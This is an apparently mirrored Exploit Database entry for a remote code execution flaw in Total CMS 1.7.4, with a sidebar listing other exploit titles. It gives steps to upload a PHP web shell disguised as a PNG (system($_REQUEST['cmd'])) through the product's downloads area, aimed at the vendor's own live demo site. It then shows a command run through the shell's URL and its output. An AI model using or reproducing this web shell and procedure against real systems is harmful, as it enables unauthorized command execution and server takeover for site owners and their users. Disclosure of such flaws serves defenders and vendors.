Total CMS 1.7.4 – Remote Code Execution (RCE)

Exploit Database
13 阅读

作者： tmrswrr

日期： 2023-06-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51500/

# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/

1) Go to this page and click edit page button
https://www.totalcms.co/demo/soccer/
2)After go down and will you see downloads area
3)Add in this area shell.php file


?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"?>
IEND

4) After open this file and write commands

https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result :

?PNG ...

uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

IEND

last Exploits
Total CMS 1.7.4 – Remote Code Execution (RCE)的更多信息

WSO2 Management Console (Multiple Products) – Unauthenticated Reflected Cross-Site Scripting (XSS)：
Simple Client Management System 1.0 – SQLi (Authentication Bypass)：
crownweb – ‘page.cfm’ SQL Injection：
Dicoogle PACS 2.5.0 – Directory Traversal：
Cacti 1.2.8 – Unauthenticated Remote Code Execution：
osCSS 1.2.1 – Database Backups Disclosure：
4Images 1.7.9 – Multiple Remote File Inclusions / SQL Injections：
SweetRice 1.5.1 – Cross-Site Request Forgery / PHP Code Execution：